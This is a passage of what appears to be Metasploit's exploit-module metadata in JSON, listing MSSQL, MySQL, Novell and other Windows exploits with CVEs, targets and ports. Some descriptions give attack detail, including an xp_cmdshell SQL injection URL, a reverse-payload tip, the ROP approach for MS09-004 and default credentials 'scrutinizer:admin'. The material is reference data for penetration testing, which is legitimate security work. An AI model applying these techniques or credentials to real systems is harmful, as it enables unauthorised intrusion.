+0000", - "path": "/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb", - "is_install_path": true, - "ref_name": "windows/mssql/ms09_004_sp_replwritetovarbin", - "check": true, - "post_auth": false, - "default_credential": false, - 
"notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/mssql/ms09_004_sp_replwritetovarbin_sqli": { - "name": "MS09-004 Microsoft SQL Server sp_replwritetovarbin Memory Corruption via SQL Injection", - "fullname": "exploit/windows/mssql/ms09_004_sp_replwritetovarbin_sqli", - "aliases": [], - "rank": 600, - "disclosure_date": "2008-12-09", - "type": "exploit", - "author": [ - "jduck ", - "Rodrigo Marcos" - ], - "description": "A heap-based buffer overflow can occur when calling the undocumented\n \"sp_replwritetovarbin\" extended stored procedure. This vulnerability affects\n all versions of Microsoft SQL Server 2000 and 2005, Windows Internal Database,\n and Microsoft Desktop Engine (MSDE) without the updates supplied in MS09-004.\n Microsoft patched this vulnerability in SP3 for 2005 without any public\n mention.\n\n This exploit smashes several pointers, as shown below.\n\n 1. pointer to a 32-bit value that is set to 0\n 2. pointer to a 32-bit value that is set to a length influenced by the buffer\n length.\n 3. pointer to a 32-bit value that is used as a vtable pointer. In MSSQL 2000,\n this value is referenced with a displacement of 0x38. For MSSQL 2005, the\n displacement is 0x10. The address of our buffer is conveniently stored in\n ecx when this instruction is executed.\n 4. On MSSQL 2005, an additional vtable ptr is smashed, which is referenced with\n a displacement of 4. This pointer is not used by this exploit.\n\n This particular exploit replaces the previous dual-method exploit. It uses\n a technique where the value contained in ecx becomes the stack. From there,\n return oriented programming is used to normalize the execution state and\n finally execute the payload via a \"jmp esp\". All addresses used were found\n within the sqlservr.exe memory space, yielding very reliable code execution\n using only a single query.\n\n NOTE: The MSSQL server service does not automatically restart by default. 
That\n said, some exceptions are caught and will not result in terminating the process.\n If the exploit crashes the service prior to hijacking the stack, it won't die.\n Otherwise, it's a goner.", - "references": [ - "OSVDB-50589", - "CVE-2008-5416", - "BID-32710", - "MSB-MS09-004", - "EDB-7501", - "URL-http://www.secforce.co.uk/blog/2011/01/exploiting-ms09-004-via-sql-injection/" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic", - "MSSQL 2000 / MSDE SP0 (8.00.194)", - "MSSQL 2000 / MSDE SP1 (8.00.384)", - "MSSQL 2000 / MSDE SP2 (8.00.534)", - "MSSQL 2000 / MSDE SP3 (8.00.760)", - "MSSQL 2000 / MSDE SP4 (8.00.2039)", - "MSSQL 2005 SP0 (9.00.1399.06)", - "MSSQL 2005 SP1 (9.00.2047.00)", - "MSSQL 2005 SP2 (9.00.3042.00)", - "CRASHER" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb", - "is_install_path": true, - "ref_name": "windows/mssql/ms09_004_sp_replwritetovarbin_sqli", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/mssql/mssql_clr_payload": { - "name": "Microsoft SQL Server Clr Stored Procedure Payload Execution", - "fullname": "exploit/windows/mssql/mssql_clr_payload", - "aliases": [], - "rank": 600, - "disclosure_date": "1999-01-01", - "type": "exploit", - "author": [ - "Lee Christensen", - "Nathan Kirk", - "OJ Reeves" - ], - "description": "This module executes an arbitrary native payload on a Microsoft SQL\n server by loading a custom SQL CLR Assembly into the target SQL\n installation, and calling it directly with a base64-encoded payload.\n\n The module requires working credentials in order to connect directly to the\n MSSQL Server.\n\n This method requires the user to have 
sufficient privileges to install a custom\n SQL CRL DLL, and invoke the custom stored procedure that comes with it.\n\n This exploit does not leave any binaries on disk.\n\n Tested on MS SQL Server versions: 2005, 2012, 2016 (all x64).", - "references": [ - "URL-https://web.archive.org/web/20200810021536/http://sekirkity.com/command-execution-in-sql-server-via-fileless-clr-based-custom-stored-procedure/" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": 1433, - "autofilter_ports": [ - 1433, - 1434, - 1435, - 14330, - 2533, - 9152, - 2638 - ], - "autofilter_services": [ - "ms-sql-s", - "ms-sql2000", - "sybase" - ], - "targets": [ - "Automatic" - ], - "mod_time": "2025-01-09 20:58:40 +0000", - "path": "/modules/exploits/windows/mssql/mssql_clr_payload.rb", - "is_install_path": true, - "ref_name": "windows/mssql/mssql_clr_payload", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/mssql/mssql_linkcrawler": { - "name": "Microsoft SQL Server Database Link Crawling Command Execution", - "fullname": "exploit/windows/mssql/mssql_linkcrawler", - "aliases": [], - "rank": 500, - "disclosure_date": "2000-01-01", - "type": "exploit", - "author": [ - "Antti Rantasaari ", - "Scott Sutherland \"nullbind\" " - ], - "description": "This module can be used to crawl MS SQL Server database links and deploy\n Metasploit payloads through links configured with sysadmin privileges using a\n valid SQL Server Login.\n\n If you are attempting to obtain multiple reverse shells using this module we\n recommend setting the \"DisablePayloadHandler\" advanced option to \"true\", and setting\n up a exploit/multi/handler to run in the background as a job to support multiple incoming\n shells.\n\n If you are interested in deploying payloads to specific servers this module also\n supports that functionality via the \"DEPLOYLIST\" option.\n\n Currently, the module is capable of 
delivering payloads to both 32bit and 64bit\n Windows systems via powershell memory injection methods based on Matthew Graeber's\n work. As a result, the target server must have powershell installed. By default,\n all of the crawl information is saved to a CSV formatted log file and MSF loot so\n that the tool can also be used for auditing without deploying payloads.", - "references": [ - "URL-http://www.slideshare.net/nullbind/sql-server-exploitation-escalation-pilfering-appsec-usa-2012", - "URL-http://msdn.microsoft.com/en-us/library/ms188279.aspx", - "URL-http://www.exploit-monday.com/2011_10_16_archive.html" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": 1433, - "autofilter_ports": [ - 1433, - 1434, - 1435, - 14330, - 2533, - 9152, - 2638 - ], - "autofilter_services": [ - "ms-sql-s", - "ms-sql2000", - "sybase" - ], - "targets": [ - "Automatic" - ], - "mod_time": "2024-02-19 10:57:53 +0000", - "path": "/modules/exploits/windows/mssql/mssql_linkcrawler.rb", - "is_install_path": true, - "ref_name": "windows/mssql/mssql_linkcrawler", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/mssql/mssql_payload": { - "name": "Microsoft SQL Server Payload Execution", - "fullname": "exploit/windows/mssql/mssql_payload", - "aliases": [], - "rank": 600, - "disclosure_date": "2000-05-30", - "type": "exploit", - "author": [ - "David Kennedy \"ReL1K\" ", - "jduck " - ], - "description": "This module executes an arbitrary payload on a Microsoft SQL Server by using\n the \"xp_cmdshell\" stored procedure. Currently, three delivery methods are supported.\n\n First, the original method uses Windows 'debug.com'. File size restrictions are\n avoided by incorporating the debug bypass method presented by SecureStat at\n Defcon 17. Since this method invokes ntvdm, it is not available on x64 systems.\n\n A second method takes advantage of the Command Stager subsystem. 
This allows using\n various techniques, such as using a TFTP server, to send the executable. By default\n the Command Stager uses 'wcsript.exe' to generate the executable on the target.\n\n Finally, ReL1K's latest method utilizes PowerShell to transmit and recreate the\n payload on the target.\n\n NOTE: This module will leave a payload executable on the target system when the\n attack is finished.", - "references": [ - "CVE-2000-0402", - "OSVDB-557", - "BID-1281", - "CVE-2000-1209", - "OSVDB-15757", - "BID-4797" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": 1433, - "autofilter_ports": [ - 1433, - 1434, - 1435, - 14330, - 2533, - 9152, - 2638 - ], - "autofilter_services": [ - "ms-sql-s", - "ms-sql2000", - "sybase" - ], - "targets": [ - "Automatic" - ], - "mod_time": "2025-03-03 19:20:56 +0000", - "path": "/modules/exploits/windows/mssql/mssql_payload.rb", - "is_install_path": true, - "ref_name": "windows/mssql/mssql_payload", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "mssql" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/mssql/mssql_payload_sqli": { - "name": "Microsoft SQL Server Payload Execution via SQL Injection", - "fullname": "exploit/windows/mssql/mssql_payload_sqli", - "aliases": [], - "rank": 600, - "disclosure_date": "2000-05-30", - "type": "exploit", - "author": [ - "David Kennedy \"ReL1K\" ", - "jduck ", - "Rodrigo Marcos" - ], - "description": "This module will execute an arbitrary payload on a Microsoft SQL\n Server, using a SQL injection vulnerability.\n\n Once a vulnerability is identified this module\n will use xp_cmdshell to upload and execute Metasploit payloads.\n It is necessary to specify the exact point where the SQL injection\n vulnerability happens. 
For example, given the following injection:\n\n http://www.example.com/show.asp?id=1;exec xp_cmdshell 'dir';--&cat=electrical\n\n you would need to set the following path:\n set GET_PATH /showproduct.asp?id=1;[SQLi];--&cat=foobar\n\n In regard to the payload, unless there is a closed port in the web server,\n you dont want to use any \"bind\" payload, specially on port 80, as you will\n stop reaching the vulnerable web server host. You want a \"reverse\" payload, probably to\n your port 80 or to any other outbound port allowed on the firewall.\n For privileged ports execute Metasploit msfconsole as root.\n\n Currently, three delivery methods are supported.\n\n First, the original method uses Windows 'debug.com'. File size restrictions are\n avoided by incorporating the debug bypass method presented by SecureStat at\n Defcon 17. Since this method invokes ntvdm, it is not available on x64 systems.\n\n A second method takes advantage of the Command Stager subsystem. This allows using\n various techniques, such as using a TFTP server, to send the executable. 
By default\n the Command Stager uses 'wcsript.exe' to generate the executable on the target.\n\n Finally, ReL1K's latest method utilizes PowerShell to transmit and recreate the\n payload on the target.\n\n NOTE: This module will leave a payload executable on the target system when the\n attack is finished.", - "references": [ - "CVE-2000-0402", - "OSVDB-557", - "BID-1281", - "CVE-2000-1209", - "OSVDB-15757", - "BID-4797", - "URL-http://www.secforce.co.uk/blog/2011/01/penetration-testing-sql-injection-and-metasploit/" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/mssql/mssql_payload_sqli.rb", - "is_install_path": true, - "ref_name": "windows/mssql/mssql_payload_sqli", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/mysql/mysql_mof": { - "name": "Oracle MySQL for Microsoft Windows MOF Execution", - "fullname": "exploit/windows/mysql/mysql_mof", - "aliases": [], - "rank": 600, - "disclosure_date": "2012-12-01", - "type": "exploit", - "author": [ - "kingcope", - "sinn3r " - ], - "description": "This module takes advantage of a file privilege misconfiguration problem\n specifically against Windows MySQL servers (due to the use of a .mof file).\n This may result in arbitrary code execution under the context of SYSTEM.\n This module requires a valid MySQL account on the target machine.", - "references": [ - "CVE-2012-5613", - "OSVDB-88118", - "EDB-23083", - "URL-https://seclists.org/fulldisclosure/2012/Dec/13" - ], - "platform": "Windows", - "arch": "", - "rport": 3306, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "MySQL on Windows prior to Vista" - ], - 
"mod_time": "2024-02-28 17:18:43 +0000", - "path": "/modules/exploits/windows/mysql/mysql_mof.rb", - "is_install_path": true, - "ref_name": "windows/mysql/mysql_mof", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": [ - "mysql" - ], - "needs_cleanup": true, - "actions": [] - }, - "exploit_windows/mysql/mysql_start_up": { - "name": "Oracle MySQL for Microsoft Windows FILE Privilege Abuse", - "fullname": "exploit/windows/mysql/mysql_start_up", - "aliases": [], - "rank": 600, - "disclosure_date": "2012-12-01", - "type": "exploit", - "author": [ - "sinn3r ", - "Sean Verity " - ], - "description": "This module takes advantage of a file privilege misconfiguration problem\n specifically against Windows MySQL servers. This module abuses the FILE\n privilege to write a payload to Microsoft's All Users Start Up directory\n which will execute every time a user logs in. The default All Users Start\n Up directory used by the module is present on Windows 7.", - "references": [ - "CVE-2012-5613", - "OSVDB-88118", - "EDB-23083", - "URL-https://seclists.org/fulldisclosure/2012/Dec/13" - ], - "platform": "Windows", - "arch": "", - "rport": 3306, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "MySQL on Windows" - ], - "mod_time": "2024-02-28 17:18:43 +0000", - "path": "/modules/exploits/windows/mysql/mysql_start_up.rb", - "is_install_path": true, - "ref_name": "windows/mysql/mysql_start_up", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": [ - "mysql" - ], - "needs_cleanup": true, - "actions": [] - }, - "exploit_windows/mysql/mysql_yassl_hello": { - "name": "MySQL yaSSL SSL Hello Message Buffer Overflow", - "fullname": "exploit/windows/mysql/mysql_yassl_hello", - "aliases": [], - "rank": 200, - "disclosure_date": "2008-01-04", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in the yaSSL 
(1.7.5 and earlier)\n implementation bundled with MySQL <= 6.0. By sending a specially crafted\n Hello packet, an attacker may be able to execute arbitrary code.", - "references": [ - "CVE-2008-0226", - "OSVDB-41195", - "BID-27140" - ], - "platform": "Windows", - "arch": "", - "rport": 3306, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "MySQL 5.0.45-community-nt", - "MySQL 5.1.22-rc-community" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/mysql/mysql_yassl_hello.rb", - "is_install_path": true, - "ref_name": "windows/mysql/mysql_yassl_hello", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/mysql/scrutinizer_upload_exec": { - "name": "Plixer Scrutinizer NetFlow and sFlow Analyzer 9 Default MySQL Credential", - "fullname": "exploit/windows/mysql/scrutinizer_upload_exec", - "aliases": [], - "rank": 600, - "disclosure_date": "2012-07-27", - "type": "exploit", - "author": [ - "MC ", - "Jonathan Claudius", - "Tanya Secker", - "sinn3r " - ], - "description": "This exploits an insecure config found in Scrutinizer NetFlow & sFlow Analyzer.\n By default, the software installs a default password in MySQL, and binds the\n service to \"0.0.0.0\". This allows any remote user to login to MySQL, and then\n gain arbitrary remote code execution under the context of 'SYSTEM'. 
Examples\n of default credentials include: 'scrutinizer:admin', and 'scrutremote:admin'.", - "references": [ - "CVE-2012-3951", - "OSVDB-84317", - "URL-http://web.archive.org/web/20140722224651/http://secunia.com/advisories/50074/", - "URL-https://www.trustwave.com/spiderlabs/advisories/TWSL2012-014.txt" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Scrutinizer NetFlow and sFlow Analyzer 9.5.2 or older" - ], - "mod_time": "2023-03-23 10:19:30 +0000", - "path": "/modules/exploits/windows/mysql/scrutinizer_upload_exec.rb", - "is_install_path": true, - "ref_name": "windows/mysql/scrutinizer_upload_exec", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/nfs/xlink_nfsd": { - "name": "Omni-NFS Server Buffer Overflow", - "fullname": "exploit/windows/nfs/xlink_nfsd", - "aliases": [], - "rank": 200, - "disclosure_date": "2006-11-06", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in Xlink Omni-NFS Server 5.2\n When sending a specially crafted nfs packet, an attacker may be able\n to execute arbitrary code.", - "references": [ - "CVE-2006-5780", - "OSVDB-30224", - "BID-20941", - "URL-http://www.securityfocus.com/data/vulnerabilities/exploits/omni-nfs-server-5.2-stackoverflow.pm" - ], - "platform": "Windows", - "arch": "", - "rport": 2049, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 2000 SP4 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/nfs/xlink_nfsd.rb", - "is_install_path": true, - "ref_name": "windows/nfs/xlink_nfsd", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - 
"needs_cleanup": null - }, - "exploit_windows/nimsoft/nimcontroller_bof": { - "name": "CA Unified Infrastructure Management Nimsoft 7.80 - Remote Buffer Overflow", - "fullname": "exploit/windows/nimsoft/nimcontroller_bof", - "aliases": [], - "rank": 600, - "disclosure_date": "2020-02-05", - "type": "exploit", - "author": [ - "wetw0rk" - ], - "description": "This module exploits a buffer overflow within the CA Unified Infrastructure Management nimcontroller.\n The vulnerability occurs in the robot (controller) component when sending a specially crafted directory_list\n probe.\n\n Technically speaking the target host must also be vulnerable to CVE-2020-8010 in order to reach the\n directory_list probe.", - "references": [ - "CVE-2020-8010", - "CVE-2020-8012", - "URL-https://support.broadcom.com/external/content/release-announcements/CA20200205-01-Security-Notice-for-CA-Unified-Infrastructure-Management/7832", - "PACKETSTORM-156577" - ], - "platform": "Windows", - "arch": "x64", - "rport": 48000, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Universal (x64) - v7.80.3132" - ], - "mod_time": "2024-07-24 16:42:43 +0000", - "path": "/modules/exploits/windows/nimsoft/nimcontroller_bof.rb", - "is_install_path": true, - "ref_name": "windows/nimsoft/nimcontroller_bof", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/nntp/ms05_030_nntp": { - "name": "MS05-030 Microsoft Outlook Express NNTP Response Parsing Buffer Overflow", - "fullname": "exploit/windows/nntp/ms05_030_nntp", - "aliases": [], - "rank": 300, - "disclosure_date": "2005-06-14", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in the news reader of Microsoft\n Outlook Express.", - "references": [ - 
"CVE-2005-1213", - "OSVDB-17306", - "BID-13951", - "MSB-MS05-030" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 2000 English SP0-SP4", - "Windows XP English SP0/SP1" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/nntp/ms05_030_nntp.rb", - "is_install_path": true, - "ref_name": "windows/nntp/ms05_030_nntp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/novell/file_reporter_fsfui_upload": { - "name": "NFR Agent FSFUI Record File Upload RCE", - "fullname": "exploit/windows/novell/file_reporter_fsfui_upload", - "aliases": [], - "rank": 500, - "disclosure_date": "2012-11-16", - "type": "exploit", - "author": [ - "juan vazquez " - ], - "description": "NFRAgent.exe, a component of Novell File Reporter (NFR), allows remote attackers to upload\n arbitrary files via a directory traversal while handling requests to /FSF/CMD with\n FSFUI records with UICMD 130. 
This module has been tested successfully against NFR\n Agent 1.0.4.3 (File Reporter 1.0.2) and NFR Agent 1.0.3.22 (File Reporter 1.0.1).", - "references": [ - "CVE-2012-4959", - "OSVDB-87573", - "URL-https://www.rapid7.com/blog/post/2012/11/16/nfr-agent-buffer-vulnerabilites-cve-2012-4959" - ], - "platform": "Windows", - "arch": "", - "rport": 3037, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic" - ], - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/exploits/windows/novell/file_reporter_fsfui_upload.rb", - "is_install_path": true, - "ref_name": "windows/novell/file_reporter_fsfui_upload", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/novell/groupwisemessenger_client": { - "name": "Novell GroupWise Messenger Client Buffer Overflow", - "fullname": "exploit/windows/novell/groupwisemessenger_client", - "aliases": [], - "rank": 300, - "disclosure_date": "2008-07-02", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in Novell's GroupWise Messenger Client.\n By sending a specially crafted HTTP response, an attacker may be able to execute\n arbitrary code.", - "references": [ - "CVE-2008-2703", - "OSVDB-46041", - "BID-29602", - "URL-http://www.infobyte.com.ar/adv/ISR-17.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Novell GroupWise Messenger 2.0 Client", - "Novell GroupWise Messenger 1.0 Client" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/novell/groupwisemessenger_client.rb", - "is_install_path": true, - "ref_name": "windows/novell/groupwisemessenger_client", - "check": false, - "post_auth": false, - "default_credential": 
false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/novell/netiq_pum_eval": { - "name": "NetIQ Privileged User Manager 2.3.1 ldapagnt_eval() Remote Perl Code Execution", - "fullname": "exploit/windows/novell/netiq_pum_eval", - "aliases": [], - "rank": 600, - "disclosure_date": "2012-11-15", - "type": "exploit", - "author": [ - "rgod", - "juan vazquez " - ], - "description": "This module abuses a lack of authorization in the NetIQ Privileged User Manager\n service (unifid.exe) to execute arbitrary perl code. The problem exists in the\n ldapagnt module. The module has been tested successfully on NetIQ PUM 2.3.1 over\n Windows 2003 SP2, which allows to execute arbitrary code with SYSTEM privileges.", - "references": [ - "CVE-2012-5932", - "OSVDB-87334", - "BID-56539", - "EDB-22738" - ], - "platform": "Windows", - "arch": "", - "rport": 443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows 2003 SP2 / NetIQ Privileged User Manager 2.3.1" - ], - "mod_time": "2022-03-11 12:22:27 +0000", - "path": "/modules/exploits/windows/novell/netiq_pum_eval.rb", - "is_install_path": true, - "ref_name": "windows/novell/netiq_pum_eval", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/novell/nmap_stor": { - "name": "Novell NetMail NMAP STOR Buffer Overflow", - "fullname": "exploit/windows/novell/nmap_stor", - "aliases": [], - "rank": 200, - "disclosure_date": "2006-12-23", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in Novell's Netmail 3.52 NMAP STOR\n verb. 
By sending an overly long string, an attacker can overwrite the\n buffer and control program execution.", - "references": [ - "CVE-2006-6424", - "OSVDB-31363", - "BID-21725" - ], - "platform": "Windows", - "arch": "", - "rport": 689, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 2000 Pro SP4 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/novell/nmap_stor.rb", - "is_install_path": true, - "ref_name": "windows/novell/nmap_stor", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/novell/zenworks_desktop_agent": { - "name": "Novell ZENworks 6.5 Desktop/Server Management Overflow", - "fullname": "exploit/windows/novell/zenworks_desktop_agent", - "aliases": [], - "rank": 400, - "disclosure_date": "2005-05-19", - "type": "exploit", - "author": [ - "Unknown" - ], - "description": "This module exploits a heap overflow in the Novell ZENworks\n Desktop Management agent. 
This vulnerability was discovered\n by Alex Wheeler.", - "references": [ - "CVE-2005-1543", - "OSVDB-16698", - "BID-13678" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP/2000/2003- ZENworks 6.5 Desktop/Server Agent" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/novell/zenworks_desktop_agent.rb", - "is_install_path": true, - "ref_name": "windows/novell/zenworks_desktop_agent", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/novell/zenworks_preboot_op21_bof": { - "name": "Novell ZENworks Configuration Management Preboot Service 0x21 Buffer Overflow", - "fullname": "exploit/windows/novell/zenworks_preboot_op21_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2010-03-30", - "type": "exploit", - "author": [ - "Stephen Fewer", - "juan vazquez " - ], - "description": "This module exploits a remote buffer overflow in the ZENworks Configuration\n Management 10 SP2. The vulnerability exists in the Preboot service and can be\n triggered by sending a specially crafted packet with the opcode 0x21\n (PROXY_CMD_FTP_FILE) to port 998/TCP. 
The module has been successfully tested on\n Novell ZENworks Configuration Management 10 SP2 and Windows Server 2003 SP2\n (DEP bypass).", - "references": [ - "CVE-2012-2215", - "OSVDB-65361", - "BID-40486", - "ZDI-10-090", - "URL-http://www.novell.com/support/kb/doc.php?id=7005572" - ], - "platform": "Windows", - "arch": "", - "rport": 998, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Novell ZENworks Configuration Management 10 SP2 / Windows 2003 SP2" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/novell/zenworks_preboot_op21_bof.rb", - "is_install_path": true, - "ref_name": "windows/novell/zenworks_preboot_op21_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/novell/zenworks_preboot_op4c_bof": { - "name": "Novell ZENworks Configuration Management Preboot Service 0x4c Buffer Overflow", - "fullname": "exploit/windows/novell/zenworks_preboot_op4c_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-02-22", - "type": "exploit", - "author": [ - "Luigi Auriemma", - "juan vazquez " - ], - "description": "This module exploits a remote buffer overflow in the ZENworks Configuration\n Management. The vulnerability exists in the Preboot service and can be triggered\n by sending a specially crafted packet with the opcode 0x4c\n (PROXY_CMD_PREBOOT_TASK_INFO2) to port 998/TCP. 
The module has been successfully\n tested on Novell ZENworks Configuration Management 10 SP2 / SP3 and Windows Server\n 2003 SP2 (DEP bypass).", - "references": [ - "CVE-2011-3176", - "OSVDB-80231", - "BID-52659", - "URL-http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=974" - ], - "platform": "Windows", - "arch": "", - "rport": 998, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Novell ZENworks Configuration Management 10 SP3 / Windows 2003 SP2", - "Novell ZENworks Configuration Management 10 SP2 / Windows 2003 SP2" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/novell/zenworks_preboot_op4c_bof.rb", - "is_install_path": true, - "ref_name": "windows/novell/zenworks_preboot_op4c_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/novell/zenworks_preboot_op6_bof": { - "name": "Novell ZENworks Configuration Management Preboot Service 0x06 Buffer Overflow", - "fullname": "exploit/windows/novell/zenworks_preboot_op6_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2010-03-30", - "type": "exploit", - "author": [ - "Stephen Fewer", - "juan vazquez " - ], - "description": "This module exploits a remote buffer overflow in the ZENworks Configuration\n Management 10 SP2. The vulnerability exists in the Preboot service and can be\n triggered by sending a specially crafted packet with the opcode 0x06\n (PROXY_CMD_CLEAR_WS) to the 998/TCP port. 
The module has been successfully tested\n on Novell ZENworks Configuration Management 10 SP2 and Windows Server 2003 SP2\n (DEP bypass).", - "references": [ - "OSVDB-65361", - "BID-40486", - "ZDI-10-090", - "URL-http://www.novell.com/support/kb/doc.php?id=7005572" - ], - "platform": "Windows", - "arch": "", - "rport": 998, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Novell ZENworks Configuration Management 10 SP2 / Windows 2003 SP2" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/novell/zenworks_preboot_op6_bof.rb", - "is_install_path": true, - "ref_name": "windows/novell/zenworks_preboot_op6_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/novell/zenworks_preboot_op6c_bof": { - "name": "Novell ZENworks Configuration Management Preboot Service 0x6c Buffer Overflow", - "fullname": "exploit/windows/novell/zenworks_preboot_op6c_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-02-22", - "type": "exploit", - "author": [ - "Luigi Auriemma", - "juan vazquez " - ], - "description": "This module exploits a remote buffer overflow in the ZENworks Configuration\n Management. The vulnerability exists in the Preboot service and can be triggered by\n sending a specially crafted packet with the opcode 0x6c (PROXY_CMD_GET_NEXT_STEP)\n to port 998/TCP. 
The module has been successfully tested on Novell ZENworks\n Configuration Management 10 SP2 / SP3 and Windows Server 2003 SP2 (DEP bypass).", - "references": [ - "CVE-2011-3175", - "OSVDB-80231", - "BID-52659", - "URL-http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=973" - ], - "platform": "Windows", - "arch": "", - "rport": 998, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Novell ZENworks Configuration Management 10 SP3 / Windows 2003 SP2", - "Novell ZENworks Configuration Management 10 SP2 / Windows 2003 SP2" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/novell/zenworks_preboot_op6c_bof.rb", - "is_install_path": true, - "ref_name": "windows/novell/zenworks_preboot_op6c_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/nuuo/nuuo_cms_fu": { - "name": "Nuuo Central Management Server 